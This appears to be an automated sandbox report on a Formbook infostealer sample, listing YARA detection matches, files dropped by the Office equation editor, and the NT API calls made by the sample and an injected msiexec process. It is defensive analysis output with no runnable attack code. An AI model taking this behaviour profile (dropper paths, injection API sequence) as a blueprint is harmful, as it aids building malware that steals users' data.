Source: Yara match; File source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.dr | OLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009B3F92 appears 105 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009B373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 0096DF5C appears 104 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 0096E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: String function: 009DF970 appears 81 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0258F970 appears 81 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0251DF5C appears 106 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0256373B appears 238 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 02563F92 appears 108 times
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0251E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A360 NtCreateFile,5_2_0041A360
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A410 NtReadFile,5_2_0041A410
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A490 NtClose,5_2_0041A490
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,5_2_0041A540
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A35A NtCreateFile,5_2_0041A35A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A40A NtReadFile,5_2_0041A40A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041A48A NtClose,5_2_0041A48A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009600C4 NtCreateFile,LdrInitializeThunk,5_2_009600C4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00960048
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960078 NtResumeThread,LdrInitializeThunk,5_2_00960078
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F9F0 NtClose,LdrInitializeThunk,5_2_0095F9F0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F900 NtReadFile,LdrInitializeThunk,5_2_0095F900
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0095FAD0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0095FAE8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0095FBB8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0095FB68
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0095FC90
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0095FC60
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FD8C NtDelayExecution,LdrInitializeThunk,5_2_0095FD8C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0095FDC0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0095FEA0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0095FED0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FFB4 NtCreateSection,LdrInitializeThunk,5_2_0095FFB4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009610D0 NtOpenProcessToken,5_2_009610D0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960060 NtQuerySection,5_2_00960060
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009601D4 NtSetValueKey,5_2_009601D4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096010C NtOpenDirectoryObject,5_2_0096010C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961148 NtOpenThread,5_2_00961148
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009607AC NtCreateMutant,5_2_009607AC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F8CC NtWaitForSingleObject,5_2_0095F8CC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961930 NtSetContextThread,5_2_00961930
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095F938 NtWriteFile,5_2_0095F938
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FAB8 NtQueryValueKey,5_2_0095FAB8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FA20 NtQueryInformationFile,5_2_0095FA20
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FA50 NtEnumerateValueKey,5_2_0095FA50
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FBE8 NtQueryVirtualMemory,5_2_0095FBE8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FB50 NtCreateKey,5_2_0095FB50
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC30 NtOpenProcess,5_2_0095FC30
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00960C40 NtGetContextThread,5_2_00960C40
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FC48 NtSetInformationFile,5_2_0095FC48
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00961D80 NtSuspendThread,5_2_00961D80
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FD5C NtEnumerateKey,5_2_0095FD5C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FE24 NtWriteVirtualMemory,5_2_0095FE24
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FFFC NtCreateProcessEx,5_2_0095FFFC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0095FF34 NtQueueApcThread,5_2_0095FF34
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,5_2_0029A036
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A042 NtQueryInformationProcess,5_2_0029A042
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025100C4 NtCreateFile,LdrInitializeThunk,7_2_025100C4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025107AC NtCreateMutant,LdrInitializeThunk,7_2_025107AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0250FAE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FB50 NtCreateKey,LdrInitializeThunk,7_2_0250FB50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0250FB68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_0250FBB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F900 NtReadFile,LdrInitializeThunk,7_2_0250F900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250F9F0 NtClose,LdrInitializeThunk,7_2_0250F9F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0250FED0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FFB4 NtCreateSection,LdrInitializeThunk,7_2_0250FFB4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0250FC60 NtMapViewOfSection,LdrInitializeThunk,7_2_0250FC60
